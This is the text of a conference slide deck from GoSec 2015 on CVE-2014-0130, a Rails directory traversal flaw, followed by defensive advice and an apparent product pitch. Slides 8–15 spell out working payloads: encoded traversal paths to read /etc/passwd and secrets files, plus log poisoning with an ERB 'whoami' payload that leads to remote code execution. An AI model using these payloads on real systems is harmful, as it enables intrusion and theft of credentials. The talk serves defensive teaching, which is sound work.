Mike Milner discusses web application security challenges, especially focusing on directory traversal vulnerabilities in Rails applications. He highlights the importance of maintaining up-to-date frameworks, monitoring for vulnerabilities, and implementing robust defenses to prevent exploits. The talk emphasizes proactive strategies such as upgrading frameworks, scanning code, and tracking file access to enhance security.

1. Protecting the Web From Within
Mike Milner
CTO @immunio
GoSec 2015

2. Today
Checked in to my flight
Read the News
Paid for Parking
Coffee with the Starbucks app
Boarding Pass Slack
Gmail
Review some Pull Requests Uber
GoSec Schedule
Trello
Banking
Facebook
Twitter
Ashley Madison
TOP SECRET
Security Clearance
with the OPM

3. All Online

4. All Online
Who is protecting
my data?

5. How?
Framework up to Date?
Libraries Patched?
Code Reviewed for Security?
Monitoring for New CVEs?
Reviewed External libraries?
Static Analysis?
Fixed Insecure Defaults?

6. Security is Hard
But it can be
SOOO
Interesting :)

7. CVE-2014-0130
“Directory traversal vulnerability”
Credited to Ville Lautanala of Flowdock
expanded on by Jeff Jarmoc @ Matasano
http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130

8. Directory Traversal
Vulnerable Route with globbing:
get 'my_url/*action', controller: ‘asdf’
*action should be a function name, or a file name
RAILS_ROOT/app/views/<controller_name>/
What if I try: my_url/../../../Gemfile

9. Directory Traversal
• /etc/passwd
• RAILS_ROOT/config/
secrets.yml
• RAILS_ROOT/config/
initializers/secret_token.rb
• SSL certificates
• /proc/self/environ
• /proc/<pid>/environ

10. Yikes!

11. Directory Traversal
Recommendation - use non-globbing route:
get ‘my_url/:action', controller: ‘asdf’
Something like ../../../Gemfile won’t match
BUT!
Route matching happens BEFORE URI decoding:
my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile

12. Can We Execute Code?
“Helpful” default behaviour in Rails
Unknown extension defaults to ERB template
<%= `whoami` %>

13. Basics
Write code into file
Ask Rails to execute it

14. Getting Code into a File
Rails does this for us!
/some/page?mycode=1234
Written to production.log
/some/page?mycode=%3c%25%3d
%20%60%69%64%60%20%25%3e
<%= `whoami` %>

15. Putting it Together
/my_url/../../../production.log?
mycode=<%= `whoami` %>
/my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2flog
%2fproduction%2elog?
mycode=%3c%25%3d%20%60%69%64%60%20%25%3e

17. How to Defend?
Upgrade Rails - fixed in 4.1.1, 4.0.5, 3.2.18
Scan your code - Brakeman >= 2.5.1
Use recommended workarounds
Only helps AFTER the vulnerability is announced!

18. Active Defence
Signature Based
Hard to maintain, Easy to bypass
WAF?

19. WAF?
Helpful bypass included in CVE!
Add ruby escape characters to traversal to hide:
../../../Gemfile

20. Active Defence
What was the actual exploit?
A file was read that shouldn’t be read
Shell commands were executed
Move INSIDE the app
and we can see these directly

21. Protect against the exploit
• Uploaded images should not be executed as code
• Don’t load configuration from /tmp
• My app does NOT need to read or write anywhere inside
/etc
• In fact, the app shouldn’t be writing anywhere except /
tmp and /var/log
• And especially not be reading from /etc/ssl or
~/.ssh/id_rsa
Track code that opens files

22. Protect against the exploit
• Most apps don’t need to execute shell commands.
FENCE IT OFF!
• If you do need shell, track the code that runs commands.
• The command that minifies my CSS should not be
downloading and executing a perl script!
• The command that sends an invoice should not be
opening a reverse shell to Russia!
• And block shell access from everywhere else.
Track shell code execution

23. Inside the App
Much more accurate Fewer false positives.
• SQL Queries for SQL Injection
• Template rendering for Cross Site Scripting
• Authentication attacks and Brute Forcing
• Cross Site Request Forgery

24. Real-time web application security
Automatic detection and protection against
app security vulnerabilities
Java Python Ruby
2 Minute Install

26. Thank You!
Mike Milner
CTO @immunio
GoSec 2015